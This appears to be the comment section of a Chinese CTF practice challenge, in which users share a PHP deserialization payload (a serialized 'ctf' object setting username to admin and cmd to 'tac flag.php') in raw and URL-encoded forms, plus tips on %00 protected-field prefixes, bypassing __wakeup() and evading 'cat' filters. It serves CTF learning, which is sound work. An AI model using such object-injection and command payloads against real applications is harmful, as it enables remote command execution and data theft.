评分(4)
解题动态
hbynb 攻破了该题 1天前
不知道不晓得 攻破了该题 1天前
Zhengzanmei 攻破了该题 2天前
邪恶的番茄 攻破了该题 2天前
out不慢 攻破了该题 2天前
铭风 攻破了该题 3天前
zrc2682 攻破了该题 4天前
辛笙 攻破了该题 4天前
ycwh 攻破了该题 7天前
cccczz 攻破了该题 8天前
Blmn 攻破了该题 9天前
caocao 攻破了该题 10天前
ysy126 攻破了该题 12天前
南交混的入朱靖宇 攻破了该题 12天前
zzt1 攻破了该题 14天前
奔跑的开开 攻破了该题 14天前
对对对对对对对对 攻破了该题 15天前
几道达瓦 攻破了该题 15天前
zhenmingshui 攻破了该题 16天前
评论
admit 3月前
举报
/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}
iNMB 4月前
举报
此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。
iNMB 4月前
举报
绕过__wakeup()后使用tac等其他输出字符的命令即可
llc123 7月前
举报
c\at flag.php也行
pezn1and 7月前
举报
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
zbss 8月前
举报
备份网站没有文件,环境出问题了吧,退钱,我还试了两次
iamblue 9月前
举报
O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D
tfios 10月前
举报
环境变量里边也有 FLAG
LLTVLL 1年前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 1年前
举报
有哪里提示了username是admin的吗
numberone 1年前
举报
源代码里不是有个if语句:if ($this->username === 'admin')